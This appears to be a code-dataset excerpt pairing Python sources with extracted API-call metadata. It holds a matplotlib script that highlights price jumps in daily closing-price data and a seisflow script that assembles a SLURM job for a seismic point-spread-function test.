'scipy.stats.ttest_rel', 'stats.ttest_rel', (['combined_without[k]', 'combined_with[k]'], {}), '(combined_without[k], combined_with[k])\n', (5898, 5937), False, 'from scipy import stats\n'), ((2283, 2318), 'os.path.join', 'os.path.join', (['p', '"""without-icecream"""'], {}), "(p, 'without-icecream')\n", (2295, 2318), False, 'import os\n'), ((2369, 2401), 'os.path.join', 'os.path.join', (['p', '"""with-icecream"""'], {}), "(p, 'with-icecream')\n", (2381, 2401), False, 'import os\n'), ((4647, 4682), 'os.path.join', 'os.path.join', (['p', '"""without-icecream"""'], {}), "(p, 'without-icecream')\n", (4659, 4682), False, 'import os\n'), ((4729, 4761), 'os.path.join', 'os.path.join', (['p', '"""with-icecream"""'], {}), "(p, 'with-icecream')\n", (4741, 4761), False, 'import os\n'), ((2664, 2683), 'os.path.basename', 'os.path.basename', (['p'], {}), '(p)\n', (2680, 2683), False, 'import os\n'), ((5046, 5065), 'os.path.basename', 'os.path.basename', (['p'], {}), '(p)\n', (5062, 5065), False, 'import os\n')]
|
# use python3
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams.update({'figure.max_open_warning': 0})
from matplotlib import patches
from matplotlib.pyplot import figure
from datetime import timedelta, date
def date_range(start_date, end_date):
for n in range(int((end_date - start_date).days)):
yield start_date + timedelta(n)
def time2int(time_str: str) -> int:
"""Transform '01:57:00' to (int)157"""
return int(time_str[:2] + time_str[3:5])
def time2str(time_int: int) -> str:
"""Transform 157 to '01:57:00'"""
padded_str = str(time_int).zfill(4) # 157 becomes "0157"
return padded_str[:2] + ":" + padded_str[2:4] + ":00"
def narrow_adjust(closing_prices, leftmost_min_index, leftmost_max_index, curr_min, curr_max, window_lborder,
window_rborder):
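    # Tighten the min/max indices across flat plateaus (runs of equal prices)
    # so the highlighted stripe covers only the actual price jump.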
best_min_index = leftmost_min_index
best_max_index = leftmost_max_index
if leftmost_min_index < leftmost_max_index:
while (closing_prices[best_min_index + 1] == curr_min):
best_min_index += 1
while (closing_prices[best_max_index - 1] == curr_max):
best_max_index -= 1
else:
while (closing_prices[best_min_index - 1] == curr_min):
best_min_index -= 1
while (closing_prices[best_max_index + 1] == curr_max):
best_max_index += 1
return best_min_index, best_max_index
def plot_graph(single_date,
closing_prices,
min_max_pairs,
min_close_price,
max_close_price,
hyperparams,
dark_mode=False):
if dark_mode:
plt.style.use('dark_background')
figure(figsize=(48, 10), dpi=100)
ax = plt.subplot(1, 1, 1)
for pair in min_max_pairs:
# print(pair)
# Green when price surges, red when price drops
if dark_mode:
curr_color = (.2, .45, .2) if pair[0] < pair[1] else (.4, .2, .2)
else:
curr_color = (.7, 1, .7) if pair[0] < pair[1] else (1, .7, .7)
ax.add_patch(
patches.Rectangle((min(pair[0], pair[1]), min_close_price),
abs(pair[0] - pair[1]),
max_close_price - min_close_price + 3,
color=curr_color))
if dark_mode:
plt.plot(closing_prices, color="#99ccff")
else:
plt.plot(closing_prices)
plt.legend(['Closing price'], fontsize=20)
plt.title(f'New Algorithm ({single_date.strftime("%Y-%m-%d")})\n' +
f'No. of green/red stripes: {len(min_max_pairs)}, ' + f'Window size: {hyperparams[0]}, ' +
f'Slope threshold: {hyperparams[1]}, ' + f'Jump size threshold: {hyperparams[2]}',
fontsize=30)
plt.xlabel('Minutes since 00:00:00', fontsize=25)
plt.xticks(fontsize=18)
plt.ylabel('Closing price', fontsize=25)
plt.yticks(fontsize=18)
plt.savefig("figures_new_algo/" + single_date.strftime("%Y-%m-%d") +
f'_{hyperparams[0]}__{hyperparams[1]}__{hyperparams[2]}_' + ('_(dark)' if dark_mode else '_(light)') +
'.png')
plt.clf()
def main(window_size, slope_threshold, jump_size_threshold):
# window_size = 5 # hyperparameter window size
# slope_threshold = 0.1 # hyperparameter slope threshold
# jump_size_threshold = 1.0 # hyperparameter jump size threshold
hyperparams = (window_size, slope_threshold, jump_size_threshold)
start_date = date(2010, 3, 24)
end_date = date(2010, 3, 27)
for single_date in date_range(start_date, end_date):
df = pd.read_csv(single_date.strftime("%Y-%m-%d") + '.csv')
df.sort_values(by='dt') # don't need?
times = df['tm'].values.tolist() # the time (hr:min:sec) column
closing_prices = df['close'].values.tolist() # the closing price column
max_close_price = max(closing_prices)
min_close_price = min(closing_prices)
start_time: int = time2int(times[0])
end_time: int = time2int(times[-1])
window_lborder: int = start_time
window_rborder: int = start_time + window_size # upperbound to be excluded
min_max_pairs = [] # list of start-end index pairs whose area between should be colored red/green
while window_lborder < end_time:
window_rborder = min(window_rborder, end_time)
curr_slice = closing_prices[window_lborder:window_rborder]
if len(curr_slice) == 0:
break
curr_min: float = min(curr_slice)
curr_max: float = max(curr_slice)
if curr_min == curr_max:
window_lborder = window_rborder
window_rborder += window_size
continue
leftmost_min_index: int = closing_prices.index(curr_min, window_lborder, window_rborder)
leftmost_max_index: int = closing_prices.index(curr_max, window_lborder, window_rborder)
best_min_index, best_max_index = narrow_adjust(closing_prices, leftmost_min_index, leftmost_max_index,
curr_min, curr_max, window_lborder, window_rborder)
if ((curr_max - curr_min) / abs(best_min_index - best_max_index) > slope_threshold) and (
(curr_max - curr_min) >= jump_size_threshold):
min_max_pairs.append([best_min_index, best_max_index])
window_lborder = max(best_min_index, best_max_index)
window_rborder = window_lborder + window_size
else:
window_lborder = window_rborder
window_rborder += window_size
plot_graph(single_date,
closing_prices,
min_max_pairs,
min_close_price,
max_close_price,
hyperparams,
dark_mode=True)
if __name__ == '__main__':
count = 0
for i in range(1, 16): # slope
for j in range(8, 26): # jump size
main(5, i / 10, j / 10)
count += 1
print(f">>>>>>{count*100/(15*18):.2f}% Done...\n")
|
[
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.yticks",
"datetime.date",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.rcParams.update",
"matplotlib.pyplot.style.use",
"matplotlib.pyplot.xticks",
"datetime.timedelta",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel"
] |
[((68, 119), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'figure.max_open_warning': 0}"], {}), "({'figure.max_open_warning': 0})\n", (87, 119), True, 'import matplotlib.pyplot as plt\n'), ((1673, 1706), 'matplotlib.pyplot.figure', 'figure', ([], {'figsize': '(48, 10)', 'dpi': '(100)'}), '(figsize=(48, 10), dpi=100)\n', (1679, 1706), False, 'from matplotlib.pyplot import figure\n'), ((1717, 1737), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(1)', '(1)'], {}), '(1, 1, 1)\n', (1728, 1737), True, 'import matplotlib.pyplot as plt\n'), ((2418, 2460), 'matplotlib.pyplot.legend', 'plt.legend', (["['Closing price']"], {'fontsize': '(20)'}), "(['Closing price'], fontsize=20)\n", (2428, 2460), True, 'import matplotlib.pyplot as plt\n'), ((2766, 2815), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Minutes since 00:00:00"""'], {'fontsize': '(25)'}), "('Minutes since 00:00:00', fontsize=25)\n", (2776, 2815), True, 'import matplotlib.pyplot as plt\n'), ((2820, 2843), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'fontsize': '(18)'}), '(fontsize=18)\n', (2830, 2843), True, 'import matplotlib.pyplot as plt\n'), ((2848, 2888), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Closing price"""'], {'fontsize': '(25)'}), "('Closing price', fontsize=25)\n", (2858, 2888), True, 'import matplotlib.pyplot as plt\n'), ((2893, 2916), 'matplotlib.pyplot.yticks', 'plt.yticks', ([], {'fontsize': '(18)'}), '(fontsize=18)\n', (2903, 2916), True, 'import matplotlib.pyplot as plt\n'), ((3137, 3146), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (3144, 3146), True, 'import matplotlib.pyplot as plt\n'), ((3482, 3499), 'datetime.date', 'date', (['(2010)', '(3)', '(24)'], {}), '(2010, 3, 24)\n', (3486, 3499), False, 'from datetime import timedelta, date\n'), ((3515, 3532), 'datetime.date', 'date', (['(2010)', '(3)', '(27)'], {}), '(2010, 3, 27)\n', (3519, 3532), False, 'from datetime import timedelta, date\n'), ((1636, 1668), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""dark_background"""'], {}), "('dark_background')\n", (1649, 1668), True, 'import matplotlib.pyplot as plt\n'), ((2329, 2370), 'matplotlib.pyplot.plot', 'plt.plot', (['closing_prices'], {'color': '"""#99ccff"""'}), "(closing_prices, color='#99ccff')\n", (2337, 2370), True, 'import matplotlib.pyplot as plt\n'), ((2389, 2413), 'matplotlib.pyplot.plot', 'plt.plot', (['closing_prices'], {}), '(closing_prices)\n', (2397, 2413), True, 'import matplotlib.pyplot as plt\n'), ((348, 360), 'datetime.timedelta', 'timedelta', (['n'], {}), '(n)\n', (357, 360), False, 'from datetime import timedelta, date\n')]
|
"""
xsede_perform_psf_test.py: get the preconditioned summed kernel for doing the PSF test.
It's just the copy of xsede_perform_structure_inversion.py, but not submit the job3, and part of the job2 is contained into job1.
useless flags may be possible to exist.
"""
import sys
from os.path import join
import click
import sh
from ...slurm.submit_job import submit_job
from ...tasks.xsede.forward import forward_task
from ..shared.build_structure import Build_structure
from .xsede_perform_source_inversion import (calculate_misfit_windows,
calculate_stations_adjoint,
change_simulation_type,
collect_sync_files,
cp_stations_adjoint2structure,
ln_adjoint_source_to_structure)
from .xsede_process_kernel import \
construct_structure as construct_process_kernel_structure
from .xsede_process_kernel import do_preconditioned_summation
@click.command()
@click.option('--base_directory', required=True, type=str, help="the base inversion directory")
@click.option('--cmts_directory', required=True, type=str, help="the cmts directory")
@click.option('--ref_directory', required=True, type=str, help="the reference specfem directory")
@click.option('--windows_directory', required=True, type=str, help="the windows directory")
@click.option('--data_asdf_directory', required=True, type=str, help="the processed data directory")
@click.option('--data_info_directory', required=True, type=str, help="the data info directory")
@click.option('--last_step_model_update_directory', required=True, type=str, help="the last step smoothed kernel directory")
@click.option('--stations_path', required=True, type=str, help="the stations path")
@click.option('--sem_utils_directory', required=True, type=str, help="the sem_utils directory")
@click.option('--source_mask_directory', required=False, default="", type=str, help="the source mask directory")
@click.option('--n_total', required=True, type=int, help="the total number of events")
@click.option('--n_each', required=True, type=int, help="number of events to run in each iteration")
@click.option('--n_iter', required=True, type=int, help="the number of iterations to run")
@click.option('--nproc', required=True, type=int, help="the number of processes used for each event")
@click.option('--n_node', required=True, type=int, help="the number of nodes used in simulation")
@click.option('--partition', required=True, type=str, help="the partion name, eg: skx-normal")
@click.option('--time_forward', required=True, type=str, help="the time used in step 1")
@click.option('--account', required=True, type=str, help="the stampede2 account")
@click.option('--periods', required=True, type=str, help="periods in filtering: minp1,maxp1/minp2,maxp2/...")
@click.option('--waveform_length', required=True, type=int, help="the length of the waveform to cut")
@click.option('--sampling_rate', required=True, type=int, help="the sampling rate to use")
@click.option('--taper_tmin_tmaxs', required=True, type=str, help="the taper time bands: minp1,maxp1/minp2,maxp2/...")
def main(base_directory, cmts_directory, ref_directory, windows_directory, data_asdf_directory, data_info_directory, last_step_model_update_directory,
stations_path, sem_utils_directory, source_mask_directory,
n_total, n_each, n_iter, nproc, n_node, partition, time_forward, account,
periods, waveform_length, sampling_rate, taper_tmin_tmaxs):
"""
perform the structure inversion for the second iteration and later.
"""
time = time_forward
# * we have to build the structure to perform the structure inversion.
build_inversion_structure(base_directory, cmts_directory, ref_directory)
# * ======================================================================================================================
# * here we have to init the slurm script, no need to load modules here
result = "date; \n"
pyexec = sys.executable
current_path = str(sh.pwd())[:-1] # pylint: disable=not-callable
# * change the flags to -F
result += change_simulation_type(pyexec,
join(base_directory, 'simulation'), "forward_save")
# * submit the forward simulation job
forward_simulation_command = forward_task(base=join(base_directory, "simulation"),
N_total=n_total, N_each=n_each, N_iter=n_iter, nproc=nproc, run_mesh=True)
result += forward_simulation_command
result += f"cd {current_path}; \n"
# * collect the sync from the forward simulation
result += collect_sync_files(
pyexec, join(base_directory, 'output'), join(base_directory, 'raw_sync'))
# * process the sync
n_cores_each_event = nproc*n_each//n_total
# ! note here mvapich2 may have the problem of "time out". No better solution, try to use 24 cores here.
    if n_cores_each_event > 24:
n_cores_each_event = 24
result += process_sync(pyexec, n_total, join(base_directory,
"raw_sync"), join(base_directory, "processed_sync"), periods, waveform_length, sampling_rate, taper_tmin_tmaxs)
result += f"cd {current_path}; \n"
# * calculate the misfit windows
body_periods, surface_periods = periods.split("/")
body_periods_splitter = body_periods.split(",")
surface_periods_splitter = surface_periods.split(",")
min_periods = f"{body_periods_splitter[0]},{surface_periods_splitter[0]}"
max_periods = f"{body_periods_splitter[1]},{surface_periods_splitter[1]}"
result += calculate_misfit_windows(pyexec, n_total,
windows_directory, join(
base_directory, "misfit_windows"), min_periods, max_periods,
data_asdf_directory, join(base_directory, "processed_sync"), data_info_directory)
# * calculate the adjoint source, and ln it to the sem directory
result += calculate_adjoint_source(pyexec, n_total,
join(base_directory, "misfit_windows"), stations_path, join(
base_directory, "raw_sync"),
join(
base_directory, "processed_sync"), data_asdf_directory,
join(base_directory, "adjoint_source"), body_periods, surface_periods)
result += ln_adjoint_source_to_structure(pyexec,
join(base_directory, "adjoint_source"), join(base_directory, "simulation"))
# * generate STATIONS_ADJOINT and cp it to the simulation directory
result += calculate_stations_adjoint(pyexec, stations_path,
join(base_directory, "misfit_windows"), join(base_directory, "stations_adjoint"))
result += cp_stations_adjoint2structure(pyexec,
join(base_directory, "stations_adjoint"), join(base_directory, "simulation"))
# * change the simulation type to the type 3
result += change_simulation_type(pyexec,
join(base_directory, 'simulation'), "structure")
# * do the adjoint simulation
adjoint_simulation_command = forward_task(base=join(base_directory, "simulation"),
N_total=n_total, N_each=n_each, N_iter=n_iter, nproc=nproc, run_mesh=False)
result += adjoint_simulation_command
result += f"cd {current_path}; \n"
# * construct the processing kernel directory
kernel_process_directory = join(base_directory, "process_kernel")
input_model_directory = join(ref_directory, "DATA", "GLL")
construct_process_kernel_structure(
join(base_directory,
"database"), ref_directory, sem_utils_directory, kernel_process_directory,
input_model_directory, last_step_model_update=last_step_model_update_directory)
# * replace the source mask
result += replace_source_mask(pyexec, join(base_directory,
'simulation'), source_mask_directory)
# * do the summation
result += do_preconditioned_summation(kernel_process_directory)
# * here we submit the first job
submit_job("psf_test", result, n_node, n_each *
nproc, partition, time, account, "stampede2")
def build_inversion_structure(base_directory, cmts_directory, ref_directory):
"""
    build_inversion_structure: build the structure to contain all the essential directories used in the inversion and the simulation directory.
"""
sh.mkdir("-p", base_directory)
# * copy cmts_directory
sh.cp("-r", cmts_directory, join(base_directory, "cmts"))
# * init the simulation directory
output_path = join(base_directory, "output")
sh.mkdir("-p", output_path)
database_path = join(base_directory, "database")
sh.mkdir("-p", database_path)
simulation_path = join(base_directory, "simulation")
sh.mkdir("-p", simulation_path)
run_script = Build_structure(
base=simulation_path, cmtfiles=join(base_directory, "cmts"), ref=ref_directory,
output=output_path, database=database_path)
run_script.run()
# * make the directory for the sync of the forward simulation
sh.mkdir("-p", join(base_directory, "raw_sync"))
sh.mkdir("-p", join(base_directory, "processed_sync"))
# * mkdir for misfit windows
sh.mkdir("-p", join(base_directory, "misfit_windows"))
# * mkdir for adjoint source
sh.mkdir("-p", join(base_directory, "adjoint_source"))
sh.mkdir("-p", join(base_directory, "stations_adjoint"))
# * mkdir for kernel processing
sh.mkdir("-p", join(base_directory, "process_kernel"))
# * mkdir to collect the perturbed sync
sh.mkdir("-p", join(base_directory, "perturbed_sync"))
sh.mkdir("-p", join(base_directory, "processed_perturbed_sync"))
def calculate_adjoint_source(py, nproc, misfit_windows_directory, stations_path, raw_sync_directory, sync_directory,
data_directory, output_directory, body_band, surface_band):
"""
    Calculate the adjoint source for the structure inversion.
"""
script = f"ibrun -n {nproc} {py} -m seisflow.scripts.structure_inversion.mpi_calculate_adjoint_source_zerolagcc_multiple_events --misfit_windows_directory {misfit_windows_directory} --stations_path {stations_path} --raw_sync_directory {raw_sync_directory} --sync_directory {sync_directory} --data_directory {data_directory} --output_directory {output_directory} --body_band {body_band} --surface_band {surface_band}; \n"
return script
def replace_gll_link(py, simulation_directory, new_gll_directory):
"""
replace all gll links.
"""
script = f"{py} -m seisflow.scripts.structure_inversion.replace_gll_link --simulation_directory {simulation_directory} --new_gll_directory {new_gll_directory}; \n"
return script
def replace_source_mask(py, base_directory, source_mask_directory):
"""
replace source masks.
"""
script = f"{py} -m seisflow.scripts.structure_inversion.replace_source_mask --base_directory {base_directory} --source_mask_directory {source_mask_directory}; \n"
return script
def process_sync(py, nproc, sync_directory, output_directory, periods, waveform_length, sampling_rate, taper_tmin_tmaxs):
"""
process the sync.
"""
script = f"ibrun -n {nproc} {py} -m seisflow.scripts.asdf.mpi_process_sync_series --sync_directory {sync_directory} --output_directory {output_directory} --periods {periods} --waveform_length {waveform_length} --sampling_rate {sampling_rate} --taper_tmin_tmaxs {taper_tmin_tmaxs}; \n"
return script
if __name__ == "__main__":
main() # pylint: disable=no-value-for-parameter
|
[
"click.option",
"sh.pwd",
"click.command",
"sh.mkdir",
"os.path.join"
] |
[((1065, 1080), 'click.command', 'click.command', ([], {}), '()\n', (1078, 1080), False, 'import click\n'), ((1082, 1181), 'click.option', 'click.option', (['"""--base_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the base inversion directory"""'}), "('--base_directory', required=True, type=str, help=\n 'the base inversion directory')\n", (1094, 1181), False, 'import click\n'), ((1178, 1267), 'click.option', 'click.option', (['"""--cmts_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the cmts directory"""'}), "('--cmts_directory', required=True, type=str, help=\n 'the cmts directory')\n", (1190, 1267), False, 'import click\n'), ((1264, 1365), 'click.option', 'click.option', (['"""--ref_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the reference specfem directory"""'}), "('--ref_directory', required=True, type=str, help=\n 'the reference specfem directory')\n", (1276, 1365), False, 'import click\n'), ((1362, 1457), 'click.option', 'click.option', (['"""--windows_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the windows directory"""'}), "('--windows_directory', required=True, type=str, help=\n 'the windows directory')\n", (1374, 1457), False, 'import click\n'), ((1454, 1558), 'click.option', 'click.option', (['"""--data_asdf_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the processed data directory"""'}), "('--data_asdf_directory', required=True, type=str, help=\n 'the processed data directory')\n", (1466, 1558), False, 'import click\n'), ((1555, 1654), 'click.option', 'click.option', (['"""--data_info_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the data info directory"""'}), "('--data_info_directory', required=True, type=str, help=\n 'the data info directory')\n", (1567, 1654), False, 'import click\n'), ((1651, 1778), 'click.option', 'click.option', (['"""--last_step_model_update_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the last step smoothed kernel directory"""'}), "('--last_step_model_update_directory', required=True, type=str,\n help='the last step smoothed kernel directory')\n", (1663, 1778), False, 'import click\n'), ((1776, 1863), 'click.option', 'click.option', (['"""--stations_path"""'], {'required': '(True)', 'type': 'str', 'help': '"""the stations path"""'}), "('--stations_path', required=True, type=str, help=\n 'the stations path')\n", (1788, 1863), False, 'import click\n'), ((1860, 1959), 'click.option', 'click.option', (['"""--sem_utils_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the sem_utils directory"""'}), "('--sem_utils_directory', required=True, type=str, help=\n 'the sem_utils directory')\n", (1872, 1959), False, 'import click\n'), ((1956, 2072), 'click.option', 'click.option', (['"""--source_mask_directory"""'], {'required': '(False)', 'default': '""""""', 'type': 'str', 'help': '"""the source mask directory"""'}), "('--source_mask_directory', required=False, default='', type=\n str, help='the source mask directory')\n", (1968, 2072), False, 'import click\n'), ((2069, 2159), 'click.option', 'click.option', (['"""--n_total"""'], {'required': '(True)', 'type': 'int', 'help': '"""the total number of events"""'}), "('--n_total', required=True, type=int, help=\n 'the total number of events')\n", (2081, 2159), False, 'import click\n'), ((2156, 2260), 'click.option', 'click.option', (['"""--n_each"""'], {'required': '(True)', 'type': 'int', 'help': '"""number of events to run in each iteration"""'}), "('--n_each', required=True, type=int, help=\n 'number of events to run in each iteration')\n", (2168, 2260), False, 'import click\n'), ((2257, 2351), 'click.option', 'click.option', (['"""--n_iter"""'], {'required': '(True)', 'type': 'int', 'help': '"""the number of iterations to run"""'}), "('--n_iter', required=True, type=int, help=\n 'the number of iterations to run')\n", (2269, 2351), False, 'import click\n'), ((2348, 2453), 'click.option', 'click.option', (['"""--nproc"""'], {'required': '(True)', 'type': 'int', 'help': '"""the number of processes used for each event"""'}), "('--nproc', required=True, type=int, help=\n 'the number of processes used for each event')\n", (2360, 2453), False, 'import click\n'), ((2450, 2551), 'click.option', 'click.option', (['"""--n_node"""'], {'required': '(True)', 'type': 'int', 'help': '"""the number of nodes used in simulation"""'}), "('--n_node', required=True, type=int, help=\n 'the number of nodes used in simulation')\n", (2462, 2551), False, 'import click\n'), ((2548, 2646), 'click.option', 'click.option', (['"""--partition"""'], {'required': '(True)', 'type': 'str', 'help': '"""the partion name, eg: skx-normal"""'}), "('--partition', required=True, type=str, help=\n 'the partion name, eg: skx-normal')\n", (2560, 2646), False, 'import click\n'), ((2643, 2735), 'click.option', 'click.option', (['"""--time_forward"""'], {'required': '(True)', 'type': 'str', 'help': '"""the time used in step 1"""'}), "('--time_forward', required=True, type=str, help=\n 'the time used in step 1')\n", (2655, 2735), False, 'import click\n'), ((2732, 2817), 'click.option', 'click.option', (['"""--account"""'], {'required': '(True)', 'type': 'str', 'help': '"""the stampede2 account"""'}), "('--account', required=True, type=str, help='the stampede2 account'\n )\n", (2744, 2817), False, 'import click\n'), ((2814, 2927), 'click.option', 'click.option', (['"""--periods"""'], {'required': '(True)', 'type': 'str', 'help': '"""periods in filtering: minp1,maxp1/minp2,maxp2/..."""'}), "('--periods', required=True, type=str, help=\n 'periods in filtering: minp1,maxp1/minp2,maxp2/...')\n", (2826, 2927), False, 'import click\n'), ((2924, 3029), 'click.option', 'click.option', (['"""--waveform_length"""'], {'required': '(True)', 'type': 'int', 'help': '"""the length of the waveform to cut"""'}), "('--waveform_length', required=True, type=int, help=\n 'the length of the waveform to cut')\n", (2936, 3029), False, 'import click\n'), ((3026, 3120), 'click.option', 'click.option', (['"""--sampling_rate"""'], {'required': '(True)', 'type': 'int', 'help': '"""the sampling rate to use"""'}), "('--sampling_rate', required=True, type=int, help=\n 'the sampling rate to use')\n", (3038, 3120), False, 'import click\n'), ((3117, 3239), 'click.option', 'click.option', (['"""--taper_tmin_tmaxs"""'], {'required': '(True)', 'type': 'str', 'help': '"""the taper time bands: minp1,maxp1/minp2,maxp2/..."""'}), "('--taper_tmin_tmaxs', required=True, type=str, help=\n 'the taper time bands: minp1,maxp1/minp2,maxp2/...')\n", (3129, 3239), False, 'import click\n'), ((7816, 7854), 'os.path.join', 'join', (['base_directory', '"""process_kernel"""'], {}), "(base_directory, 'process_kernel')\n", (7820, 7854), False, 'from os.path import join\n'), ((7883, 7917), 'os.path.join', 'join', (['ref_directory', '"""DATA"""', '"""GLL"""'], {}), "(ref_directory, 'DATA', 'GLL')\n", (7887, 7917), False, 'from os.path import join\n'), ((8830, 8860), 'sh.mkdir', 'sh.mkdir', (['"""-p"""', 'base_directory'], {}), "('-p', base_directory)\n", (8838, 8860), False, 'import sh\n'), ((9007, 9037), 'os.path.join', 'join', (['base_directory', '"""output"""'], {}), "(base_directory, 'output')\n", (9011, 9037), False, 'from os.path import join\n'), ((9042, 9069), 'sh.mkdir', 'sh.mkdir', (['"""-p"""', 'output_path'], {}), "('-p', output_path)\n", (9050, 9069), False, 'import sh\n'), ((9090, 9122), 'os.path.join', 'join', (['base_directory', '"""database"""'], {}), "(base_directory, 'database')\n", (9094, 9122), False, 'from os.path import join\n'), ((9127, 9156), 'sh.mkdir', 'sh.mkdir', (['"""-p"""', 'database_path'], {}), "('-p', database_path)\n", (9135, 9156), False, 'import sh\n'), ((9179, 9213), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (9183, 9213), False, 'from os.path import join\n'), ((9218, 9249), 'sh.mkdir', 'sh.mkdir', (['"""-p"""', 'simulation_path'], {}), "('-p', simulation_path)\n", (9226, 9249), False, 'import sh\n'), ((4308, 4342), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (4312, 4342), False, 'from os.path import join\n'), ((4793, 4823), 'os.path.join', 'join', (['base_directory', '"""output"""'], {}), "(base_directory, 'output')\n", (4797, 4823), False, 'from os.path import join\n'), ((4825, 4857), 'os.path.join', 'join', (['base_directory', '"""raw_sync"""'], {}), "(base_directory, 'raw_sync')\n", (4829, 4857), False, 'from os.path import join\n'), ((5150, 5182), 'os.path.join', 'join', (['base_directory', '"""raw_sync"""'], {}), "(base_directory, 'raw_sync')\n", (5154, 5182), False, 'from os.path import join\n'), ((5233, 5271), 'os.path.join', 'join', (['base_directory', '"""processed_sync"""'], {}), "(base_directory, 'processed_sync')\n", (5237, 5271), False, 'from os.path import join\n'), ((5843, 5881), 'os.path.join', 'join', (['base_directory', '"""misfit_windows"""'], {}), "(base_directory, 'misfit_windows')\n", (5847, 5881), False, 'from os.path import join\n'), ((6013, 6051), 'os.path.join', 'join', (['base_directory', '"""processed_sync"""'], {}), "(base_directory, 'processed_sync')\n", (6017, 6051), False, 'from os.path import join\n'), ((6238, 6276), 'os.path.join', 'join', (['base_directory', '"""misfit_windows"""'], {}), "(base_directory, 'misfit_windows')\n", (6242, 6276), False, 'from os.path import join\n'), ((6293, 6325), 'os.path.join', 'join', (['base_directory', '"""raw_sync"""'], {}), "(base_directory, 'raw_sync')\n", (6297, 6325), False, 'from os.path import join\n'), ((6410, 6448), 'os.path.join', 'join', (['base_directory', '"""processed_sync"""'], {}), "(base_directory, 'processed_sync')\n", (6414, 6448), False, 'from os.path import join\n'), ((6554, 6592), 'os.path.join', 'join', (['base_directory', '"""adjoint_source"""'], {}), "(base_directory, 'adjoint_source')\n", (6558, 6592), False, 'from os.path import join\n'), ((6723, 6761), 'os.path.join', 'join', (['base_directory', '"""adjoint_source"""'], {}), "(base_directory, 'adjoint_source')\n", (6727, 6761), False, 'from os.path import join\n'), ((6763, 6797), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (6767, 6797), False, 'from os.path import join\n'), ((6976, 7014), 'os.path.join', 'join', (['base_directory', '"""misfit_windows"""'], {}), "(base_directory, 'misfit_windows')\n", (6980, 7014), False, 'from os.path import join\n'), ((7016, 7056), 'os.path.join', 'join', (['base_directory', '"""stations_adjoint"""'], {}), "(base_directory, 'stations_adjoint')\n", (7020, 7056), False, 'from os.path import join\n'), ((7154, 7194), 'os.path.join', 'join', (['base_directory', '"""stations_adjoint"""'], {}), "(base_directory, 'stations_adjoint')\n", (7158, 7194), False, 'from os.path import join\n'), ((7196, 7230), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (7200, 7230), False, 'from os.path import join\n'), ((7363, 7397), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (7367, 7397), False, 'from os.path import join\n'), ((7966, 7998), 'os.path.join', 'join', (['base_directory', '"""database"""'], {}), "(base_directory, 'database')\n", (7970, 7998), False, 'from os.path import join\n'), ((8237, 8271), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (8241, 8271), False, 'from os.path import join\n'), ((8921, 8949), 'os.path.join', 'join', (['base_directory', '"""cmts"""'], {}), "(base_directory, 'cmts')\n", (8925, 8949), False, 'from os.path import join\n'), ((9530, 9562), 'os.path.join', 'join', (['base_directory', '"""raw_sync"""'], {}), "(base_directory, 'raw_sync')\n", (9534, 9562), False, 'from os.path import join\n'), ((9583, 9621), 'os.path.join', 'join', (['base_directory', '"""processed_sync"""'], {}), "(base_directory, 'processed_sync')\n", (9587, 9621), False, 'from os.path import join\n'), ((9675, 9713), 'os.path.join', 'join', (['base_directory', '"""misfit_windows"""'], {}), "(base_directory, 'misfit_windows')\n", (9679, 9713), False, 'from os.path import join\n'), ((9767, 9805), 'os.path.join', 'join', (['base_directory', '"""adjoint_source"""'], {}), "(base_directory, 'adjoint_source')\n", (9771, 9805), False, 'from os.path import join\n'), ((9826, 9866), 'os.path.join', 'join', (['base_directory', '"""stations_adjoint"""'], {}), "(base_directory, 'stations_adjoint')\n", (9830, 9866), False, 'from os.path import join\n'), ((9923, 9961), 'os.path.join', 'join', (['base_directory', '"""process_kernel"""'], {}), "(base_directory, 'process_kernel')\n", (9927, 9961), False, 'from os.path import join\n'), ((10026, 10064), 'os.path.join', 'join', (['base_directory', '"""perturbed_sync"""'], {}), "(base_directory, 'perturbed_sync')\n", (10030, 10064), False, 'from os.path import join\n'), ((10085, 10133), 'os.path.join', 'join', (['base_directory', '"""processed_perturbed_sync"""'], {}), "(base_directory, 'processed_perturbed_sync')\n", (10089, 10133), False, 'from os.path import join\n'), ((4148, 4156), 'sh.pwd', 'sh.pwd', ([], {}), '()\n', (4154, 4156), False, 'import sh\n'), ((4453, 4487), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (4457, 4487), False, 'from os.path import join\n'), ((7497, 7531), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (7501, 7531), False, 'from os.path import join\n'), ((9323, 9351), 'os.path.join', 'join', (['base_directory', '"""cmts"""'], {}), "(base_directory, 'cmts')\n", (9327, 9351), False, 'from os.path import join\n')]
|
# from __future__ import annotations
from abc import ABCMeta, abstractmethod
from typing import List, TypeVar, Dict
from ..Peripheral_interface import Peripherical_interface
